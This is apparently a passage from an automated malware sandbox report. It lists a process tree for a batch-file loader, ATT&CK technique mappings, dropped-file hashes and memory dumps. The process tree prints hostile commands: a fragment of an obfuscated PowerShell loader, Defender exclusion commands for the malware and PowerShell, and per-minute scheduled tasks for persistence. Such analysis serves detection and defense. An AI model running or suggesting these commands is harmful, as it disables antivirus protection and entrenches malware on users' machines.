'')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:5112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:3904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\system.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
PID:3924

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system" /tr "C:\Users\Admin\system.exe"
8⤵
- Creates scheduled task(s)
PID:884

C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe
"C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe"
3⤵
- Drops startup file
- Adds Run key to start application
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn OSBLTR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
4⤵
- Suspicious use of WriteProcessMemory
PID:3784

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn OSBLTR.exe /tr C:\Users\Admin\AppData\Roaming\Windata\system.exe /sc minute /mo 1
5⤵
- Creates scheduled task(s)
PID:4060

C:\Windows\SysWOW64\WSCript.exe
WSCript C:\Users\Admin\AppData\Local\Temp\OSBLTR.vbs
4⤵
PID:2172

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:1568

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3960,i,14221647728265121051,6840906015709541562,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8
1⤵
PID:2364

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:3924

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:4620

C:\Users\Admin\system.exe
C:\Users\Admin\system.exe
1⤵
- Executes dropped EXE
PID:2920

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:1780

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:408

C:\Users\Admin\AppData\Roaming\Windata\system.exe
C:\Users\Admin\AppData\Roaming\Windata\system.exe
1⤵
- Executes dropped EXE
PID:4968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e582096.rbs

Filesize
621B

MD5
7758758e3f25effadbfbc1885bca6f35

SHA1
e92b46894f8aadbd507e3619db25b1859728e0f7

SHA256
86981a80445e3cdfacf0d7417550d579561da73675782eff74b07a8c975f048d

SHA512
f6aeaccde8365091bae35ba6e55bb9ebd42727c3d1056b0c6e3b4b172d1cb66b3300720ba3f004c1134bcd6229682207de47bf0bce644be28f4e97873d38a460

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5d6cd4e490a86d4b98f9710e5cff4966

SHA1
a43ff6a953b8bd1af4be6d2efdf5108b816055f8

SHA256
a383a24a03886b865555ed24e8a34cc862e52bda888037e5ae171cb09e613a83

SHA512
978aaa6d3fe34ea6b1d95e1bd9f8caca7880046080724713be189ff7f4eb633f3f3061c3a492d26c5325aa02344e58079a0bc0facb08e84654483160bc54dbc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c86c3e25a792d076a4a536de7a7f627c

SHA1
060d5ad7e5e3aaa57528fcfa70de984e4bb1eb32

SHA256
ed48c366f0eda797f5d032142a48b9d02fb3cebb25c4cb1dcb1f8fc05127d22e

SHA512
de2d7e10d45f521385f062b1e54cd9123deccdda8c3cf1c5e0bbba8a40497f2c3da6cd80e5523d089fde8de17eb05168760be21445f36a1f0f285a9632b9e52a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f4dcd7d3d96bd15108c044adc317b4e1

SHA1
2fbbd37e5230693bf1641fef21e14da0e44d985f

SHA256
0abe4efccf99341d93cdbd06c7833e726ddac31f0b186275f337b2e24554ae8c

SHA512
769aea4e41cad5af306724c03177bb62cea2b458704f5bad8f365ec91e5b107f9a3a090048af66a77aa8f4ee4a1aa6527a1944881dd7ed976de2107322447847

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
edf5c3d14f2ddff791b52daeef14d4c3

SHA1
5d4b274aa01d3aeb72a54eb4579e128e8949ea93

SHA256
5a3df95fb030e6cbc7683db939a00fffc9cf3afb205411c789db06623b59ec73

SHA512
4e9d9ad5bb466ad8708149cc36d634865218da142993f36107d3b059d8ffa173a253e1ed05bb6e3ae4cb7dd7edeb32ce3bf1bf62dd34d7d2f0b6a0beb2f5fe67

Download Submit
C:\Users\Admin\AppData\Local\Temp\OSBLTR.vbs

Filesize
832B

MD5
ca4eaf12d177153470b5821d4af77a5c

SHA1
f675e4cfba6e211e777dd5e9e2b67ad5c28139e0

SHA256
d7b09a6083ccd83233d63076a924d8389a902ad003928b5ca684ffffd9f593b7

SHA512
acd70a9850ec6595bbc6956cfd218fe6ca85e1f1e3799210efd4102d48e12cdc31aee4d7459ad3a43dab5880d8be5eaea2174d6da26d455a4cac5a749e03f759

Download Submit
C:\Users\Admin\AppData\Local\Temp\TBYPAE.exe

Filesize
790KB

MD5
346bf182c60f9b5f09de383e64548d12

SHA1
e8ed60bf0b4f2b996d386d03cf26042f0e4ae92a

SHA256
bb58ac631bb7905c665d82869ba13fc6e1a92f27c89934f3cbb6f4fc057eb7e3

SHA512
55edb9a299edc5dbbd7152e855d990f6c379e56b97fde783ae97f0554f251c602f403e6d8548c351969363b442ce35e3558151acabf9c0801503df9a00fb944a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1zpi2ukd.yfu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\loader (5).bat

Filesize
309KB

MD5
1062132055a7e834b24e3d07a6e4aaa9

SHA1
e237e0bb211e3b9c06dff82b757dcc67d8e3b4b0

SHA256
517881836b87027fc9f923533c0738227c9e986d85a41c332444856719477baf

SHA512
90f33636541c110144b00ccbf80f9812565f80e510547904534ff5b70c1f3eacdcf411ebb2d3bec730c918887a84519b41f7bdfdc5e11dbd2097e9d55517443a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_742.vbs

Filesize
115B

MD5
d0c35eb62305c264631f69c1bf9426ad

SHA1
996a9395d00b97659a92bf30ec7ee8477217c25d

SHA256
6ee58c349572adb25696f1cb8e9df812dde78dba77eb10faee9ef3bf21a8b8af

SHA512
490d011c8555a3d775bd626d53c3ef918b4edc2e639a2e3c3aaba19ee1ef7ceee988d529dfe1b0456f32cb4b9386f0407871402afde1948bd13f1ec7264583f9

Download Submit
C:\Users\Admin\system.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Windows\Installer\MSI221A.tmp

Filesize
1.1MB

MD5
bf1324998af8532a11a3bb3553396eeb

SHA1
931fb1c2f7b52451cdc7cb3ee43e11b7b14c312a

SHA256
eb57ea0d8c22ca46ae8e3a5036c805ef4d67c82ba5b5af224a495bca46ddbec1

SHA512
7ea2390673d8f9f259fd683bb8cdab8a39a89ec11c3c2bfbd3200ef538ea34b34ee31375af4fdff9d7f8b08c07632119e93d413246d7d035bf23231303650258

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.7MB

MD5
f218be0d77c158cc8c630a4e51bfb675

SHA1
e11e73616a499152b440a15d131aae30ead4b7de

SHA256
751f284aec5bfacda5119a1355efd14fde4b2bae56dd79bca40fa363b594283d

SHA512
481614c0b940c4fb6c137920261d51d021b943fc13d1b435b9b3133c5e06438b9192f1b240ddd509d69a8cafee6197e886c4af742a8c28529e11767d6835c132

Download Submit
\??\Volume{8a2ad7b7-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{fce5e736-6c17-4371-bf69-c08637f98c08}_OnDiskSnapshotProp

Filesize
6KB

MD5
ba76a92c737c417588acf4a3ee509388

SHA1
207e4e18956b57b0b309fd7cdd7dedea288b774c

SHA256
ef87d1c950bf03f6edb84f0b893b2f420794f0c6ebfd0e3c47a5757da13b445e

SHA512
49ef4031071c4a8ec578ee18a58c92cf18f842dc696857b34ffe2d000494ecca3d04ffc4416785a6ddc9e8620c4c6300f46cd30eb9e924fa7802da2bc3e43259

Download Submit
memory/408-257-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/408-258-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1780-249-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1944-113-0x0000000007250000-0x00000000072EC000-memory.dmp

Filesize
624KB

Download
memory/1944-112-0x0000000007190000-0x00000000071AC000-memory.dmp

Filesize
112KB

Download
memory/1944-216-0x00000000085B0000-0x00000000085BA000-memory.dmp

Filesize
40KB

Download
memory/1944-215-0x00000000084D0000-0x0000000008562000-memory.dmp

Filesize
584KB

Download
memory/2388-52-0x0000000005BD0000-0x0000000005C36000-memory.dmp

Filesize
408KB

Download
memory/2388-61-0x0000000007A30000-0x00000000080AA000-memory.dmp

Filesize
6.5MB

Download
memory/2388-44-0x0000000004CE0000-0x0000000004D16000-memory.dmp

Filesize
216KB

Download
memory/2388-65-0x00000000080B0000-0x0000000008654000-memory.dmp

Filesize
5.6MB

Download
memory/2388-64-0x00000000073D0000-0x000000000740C000-memory.dmp

Filesize
240KB

Download
memory/2388-63-0x00000000067C0000-0x00000000067C8000-memory.dmp

Filesize
32KB

Download
memory/2388-62-0x0000000006790000-0x00000000067AA000-memory.dmp

Filesize
104KB

Download
memory/2388-45-0x00000000053A0000-0x00000000059C8000-memory.dmp

Filesize
6.2MB

Download
memory/2388-60-0x0000000006200000-0x000000000624C000-memory.dmp

Filesize
304KB

Download
memory/2388-59-0x00000000061B0000-0x00000000061CE000-memory.dmp

Filesize
120KB

Download
memory/2388-58-0x0000000005D20000-0x0000000006074000-memory.dmp

Filesize
3.3MB

Download
memory/2388-53-0x0000000005CB0000-0x0000000005D16000-memory.dmp

Filesize
408KB

Download
memory/2388-46-0x0000000005B20000-0x0000000005B42000-memory.dmp

Filesize
136KB

Download
memory/2980-178-0x0000000074820000-0x000000007486C000-memory.dmp

Filesize
304KB

Download
memory/3904-157-0x0000000074820000-0x000000007486C000-memory.dmp

Filesize
304KB

Download
memory/3924-120-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/3924-119-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/3924-200-0x0000000074820000-0x000000007486C000-memory.dmp

Filesize
304KB

Download
memory/4352-91-0x0000000007B50000-0x0000000007B61000-memory.dmp

Filesize
68KB

Download
memory/4352-90-0x0000000007BD0000-0x0000000007C66000-memory.dmp

Filesize
600KB

Download
memory/4352-89-0x00000000079C0000-0x00000000079CA000-memory.dmp

Filesize
40KB

Download
memory/4352-88-0x0000000007850000-0x00000000078F3000-memory.dmp

Filesize
652KB

Download
memory/4352-87-0x00000000077D0000-0x00000000077EE000-memory.dmp

Filesize
120KB

Download
memory/4352-76-0x0000000007810000-0x0000000007842000-memory.dmp

Filesize
200KB

Download
memory/4352-77-0x0000000074820000-0x000000007486C000-memory.dmp

Filesize
304KB

Download
memory/4620-231-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4620-230-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-243-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-244-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-269-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-268-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-218-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-219-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-220-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-224-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-226-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-228-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-189-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-267-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-261-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-242-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-264-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-262-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-245-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-246-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-247-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-263-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-250-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-251-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-252-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-253-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-254-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-255-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-116-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-26-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-259-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4880-260-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/4968-266-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/5112-143-0x0000000007E40000-0x0000000007E54000-memory.dmp

Filesize
80KB

Download
memory/5112-130-0x0000000074820000-0x000000007486C000-memory.dmp

Filesize
304KB

Download
memory/5112-140-0x0000000007AD0000-0x0000000007B73000-memory.dmp

Filesize
652KB

Download
memory/5112-141-0x0000000007E00000-0x0000000007E11000-memory.dmp

Filesize
68KB

Download
memory/5112-142-0x0000000007E30000-0x0000000007E3E000-memory.dmp

Filesize
56KB

Download
memory/5112-144-0x0000000007E80000-0x0000000007E9A000-memory.dmp

Filesize
104KB

Download
memory/5112-145-0x0000000007E70000-0x0000000007E78000-memory.dmp

Filesize
32KB

Download